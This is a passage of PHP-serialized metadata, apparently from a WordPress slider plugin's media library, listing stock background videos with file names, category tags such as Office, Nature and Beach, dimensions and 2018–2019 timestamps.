File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:329;a:13:{s:2:\"id\";s:3:\"509\";s:6:\"handle\";s:11:\"Swiping.jpg\";s:5:\"video\";s:11:\"Swiping.mp4\";s:4:\"name\";s:8:\"Swiping \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:330;a:13:{s:2:\"id\";s:3:\"508\";s:6:\"handle\";s:9:\"Alarm.jpg\";s:5:\"video\";s:9:\"Alarm.mp4\";s:4:\"name\";s:6:\"Alarm \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1013\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:331;a:13:{s:2:\"id\";s:3:\"507\";s:6:\"handle\";s:13:\"Hey-World.jpg\";s:5:\"video\";s:13:\"Hey-World.mp4\";s:4:\"name\";s:10:\"Hey World \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:332;a:13:{s:2:\"id\";s:3:\"506\";s:6:\"handle\";s:28:\"Typing-on-the-keyboard-2.jpg\";s:5:\"video\";s:28:\"Typing-on-the-keyboard-2.mp4\";s:4:\"name\";s:25:\"Typing on the keyboard 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:333;a:13:{s:2:\"id\";s:3:\"505\";s:6:\"handle\";s:10:\"Valley.jpg\";s:5:\"video\";s:10:\"Valley.mp4\";s:4:\"name\";s:7:\"Valley \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:334;a:13:{s:2:\"id\";s:3:\"504\";s:6:\"handle\";s:9:\"Stars.jpg\";s:5:\"video\";s:9:\"Stars.mp4\";s:4:\"name\";s:6:\"Stars \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:335;a:13:{s:2:\"id\";s:3:\"503\";s:6:\"handle\";s:21:\"Car-in-the-forest.jpg\";s:5:\"video\";s:21:\"Car-in-the-forest.mp4\";s:4:\"name\";s:18:\"Car in the forest \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1012\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:336;a:13:{s:2:\"id\";s:3:\"502\";s:6:\"handle\";s:15:\"Aerial-Shot.jpg\";s:5:\"video\";s:15:\"Aerial-Shot.mp4\";s:4:\"name\";s:12:\"Aerial Shot \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:337;a:13:{s:2:\"id\";s:3:\"501\";s:6:\"handle\";s:14:\"Disco-Ball.jpg\";s:5:\"video\";s:14:\"Disco-Ball.mp4\";s:4:\"name\";s:11:\"Disco Ball \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:338;a:13:{s:2:\"id\";s:3:\"500\";s:6:\"handle\";s:22:\"Man-Playing-Guitar.jpg\";s:5:\"video\";s:22:\"Man-Playing-Guitar.mp4\";s:4:\"name\";s:19:\"Man Playing Guitar \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:339;a:13:{s:2:\"id\";s:3:\"499\";s:6:\"handle\";s:14:\"Live-Music.jpg\";s:5:\"video\";s:14:\"Live-Music.mp4\";s:4:\"name\";s:11:\"Live Music \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:340;a:13:{s:2:\"id\";s:3:\"498\";s:6:\"handle\";s:12:\"Cheer-Up.jpg\";s:5:\"video\";s:12:\"Cheer-Up.mp4\";s:4:\"name\";s:9:\"Cheer Up \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:341;a:13:{s:2:\"id\";s:3:\"497\";s:6:\"handle\";s:14:\"Night-club.jpg\";s:5:\"video\";s:14:\"Night-club.mp4\";s:4:\"name\";s:11:\"Night club \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:342;a:13:{s:2:\"id\";s:3:\"496\";s:6:\"handle\";s:17:\"Cup-Of-Coffee.jpg\";s:5:\"video\";s:17:\"Cup-Of-Coffee.mp4\";s:4:\"name\";s:14:\"Cup Of Coffee \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:343;a:13:{s:2:\"id\";s:3:\"495\";s:6:\"handle\";s:7:\"Pot.jpg\";s:5:\"video\";s:7:\"Pot.mp4\";s:4:\"name\";s:4:\"Pot \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:344;a:13:{s:2:\"id\";s:3:\"494\";s:6:\"handle\";s:11:\"Grill-2.jpg\";s:5:\"video\";s:11:\"Grill-2.mp4\";s:4:\"name\";s:8:\"Grill 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:345;a:13:{s:2:\"id\";s:3:\"493\";s:6:\"handle\";s:13:\"Rice-Bowl.jpg\";s:5:\"video\";s:13:\"Rice-Bowl.mp4\";s:4:\"name\";s:10:\"Rice Bowl \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1010\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:346;a:13:{s:2:\"id\";s:3:\"492\";s:6:\"handle\";s:9:\"Grill.jpg\";s:5:\"video\";s:9:\"Grill.mp4\";s:4:\"name\";s:6:\"Grill \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:347;a:13:{s:2:\"id\";s:3:\"491\";s:6:\"handle\";s:9:\"Water.jpg\";s:5:\"video\";s:9:\"Water.mp4\";s:4:\"name\";s:6:\"Water \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:348;a:13:{s:2:\"id\";s:3:\"490\";s:6:\"handle\";s:17:\"Feet-and-Sand.jpg\";s:5:\"video\";s:17:\"Feet-and-Sand.mp4\";s:4:\"name\";s:14:\"Feet and Sand \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:349;a:13:{s:2:\"id\";s:3:\"489\";s:6:\"handle\";s:9:\"Ocean.jpg\";s:5:\"video\";s:9:\"Ocean.mp4\";s:4:\"name\";s:6:\"Ocean \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:350;a:13:{s:2:\"id\";s:3:\"488\";s:6:\"handle\";s:9:\"Waves.jpg\";s:5:\"video\";s:9:\"Waves.mp4\";s:4:\"name\";s:6:\"Waves \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:351;a:13:{s:2:\"id\";s:3:\"487\";s:6:\"handle\";s:10:\"Hearts.jpg\";s:5:\"video\";s:10:\"Hearts.mp4\";s:4:\"name\";s:7:\"Hearts \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:352;a:13:{s:2:\"id\";s:3:\"486\";s:6:\"handle\";s:12:\"Octagons.jpg\";s:5:\"video\";s:12:\"Octagons.mp4\";s:4:\"name\";s:9:\"Octagons \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:353;a:13:{s:2:\"id\";s:3:\"485\";s:6:\"handle\";s:11:\"Squares.jpg\";s:5:\"video\";s:11:\"Squares.mp4\";s:4:\"name\";s:8:\"Squares \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:354;a:13:{s:2:\"id\";s:3:\"484\";s:6:\"handle\";s:12:\"Pink-ink.jpg\";s:5:\"video\";s:12:\"Pink-ink.mp4\";s:4:\"name\";s:9:\"Pink ink \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:355;a:13:{s:2:\"id\";s:3:\"483\";s:6:\"handle\";s:22:\"Blurred-Background.jpg\";s:5:\"video\";s:22:\"Blurred-Background.mp4\";s:4:\"name\";s:19:\"Blurred Background \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:356;a:13:{s:2:\"id\";s:3:\"482\";s:6:\"handle\";s:20:\"Blinking-bubbles.jpg\";s:5:\"video\";s:20:\"Blinking-bubbles.mp4\";s:4:\"name\";s:17:\"Blinking bubbles \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:357;a:13:{s:2:\"id\";s:3:\"481\";s:6:\"handle\";s:13:\"Fireworks.jpg\";s:5:\"video\";s:13:\"Fireworks.mp4\";s:4:\"name\";s:10:\"Fireworks \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:358;a:13:{s:2:\"id\";s:3:\"480\";s:6:\"handle\";s:12:\"Dark-ink.jpg\";s:5:\"video\";s:12:\"Dark-ink.mp4\";s:4:\"name\";s:9:\"Dark ink \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:359;a:13:{s:2:\"id\";s:3:\"238\";s:6:\"handle\";s:12:\"Mt_Baker.jpg\";s:5:\"video\";s:12:\"Mt_Baker.mp4\";s:4:\"name\";s:9:\"Mt Baker \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:360;a:13:{s:2:\"id\";s:3:\"237\";s:6:\"handle\";s:16:\"Two-Swimmers.jpg\";s:5:\"video\";s:16:\"Two-Swimmers.mp4\";s:4:\"name\";s:13:\"Two Swimmers \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:361;a:13:{s:2:\"id\";s:3:\"236\";s:6:\"handle\";s:14:\"Boats_Maze.jpg\";s:5:\"video\";s:14:\"Boats_Maze.mp4\";s:4:\"name\";s:11:\"Boats Maze \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:362;a:13:{s:2:\"id\";s:3:\"235\";s:6:\"handle\";s:18:\"Candolim-Beach.jpg\";s:5:\"video\";s:18:\"Candolim-Beach.mp4\";s:4:\"name\";s:15:\"Candolim Beach \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:363;a:13:{s:2:\"id\";s:3:\"234\";s:6:\"handle\";s:17:\"Working-Space.jpg\";s:5:\"video\";s:17:\"Working-Space.mp4\";s:4:\"name\";s:14:\"Working Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:364;a:13:{s:2:\"id\";s:3:\"233\";s:6:\"handle\";s:9:\"Wavez.jpg\";s:5:\"video\";s:9:\"Wavez.mp4\";s:4:\"name\";s:6:\"Wavez \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:365;a:13:{s:2:\"id\";s:3:\"232\";s:6:\"handle\";s:17:\"Coconut-Grove.jpg\";s:5:\"video\";s:17:\"Coconut-Grove.mp4\";s:4:\"name\";s:14:\"Coconut Grove \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:366;a:13:{s:2:\"id\";s:3:\"231\";s:6:\"handle\";s:19:\"Very-Open-Space.jpg\";s:5:\"video\";s:19:\"Very-Open-Space.mp4\";s:4:\"name\";s:16:\"Very Open Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:367;a:13:{s:2:\"id\";s:3:\"230\";s:6:\"handle\";s:14:\"Office-Day.jpg\";s:5:\"video\";s:14:\"Office-Day.mp4\";s:4:\"name\";s:11:\"Office Day \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:368;a:13:{s:2:\"id\";s:3:\"229\";s:6:\"handle\";s:12:\"The-Hill.jpg\";s:5:\"video\";s:12:\"The-Hill.mp4\";s:4:\"name\";s:9:\"The Hill \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:369;a:13:{s:2:\"id\";s:3:\"339\";s:6:\"handle\";s:19:\"best_price_dark.jpg\";s:5:\"video\";s:19:\"best_price_dark.mp4\";s:4:\"name\";s:15:\"best_price_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"best_price_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 